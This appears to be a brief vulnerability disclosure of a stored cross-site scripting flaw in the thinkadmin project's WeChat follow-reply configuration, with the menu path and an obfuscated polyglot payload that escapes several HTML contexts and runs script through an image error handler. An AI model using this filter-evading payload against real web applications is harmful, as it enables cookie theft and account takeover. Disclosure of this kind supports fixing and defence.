Cross-site Scripting (XSS) - Stored in zoujingli/thinkadmin
Sep 17th 2021
Proof of Concept
In Wechat management at feature - Reply rule management - Follow reply configuration - Default reply configuration - Follow automatic replies Save Reply text with payload : </titLe/</teXtarEa/</scRipt/--!>\x3csVg/<iMg SrC="x" oNeRRor="alert(1);">\x3e XSS will trigger when reloading page or goto edit
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.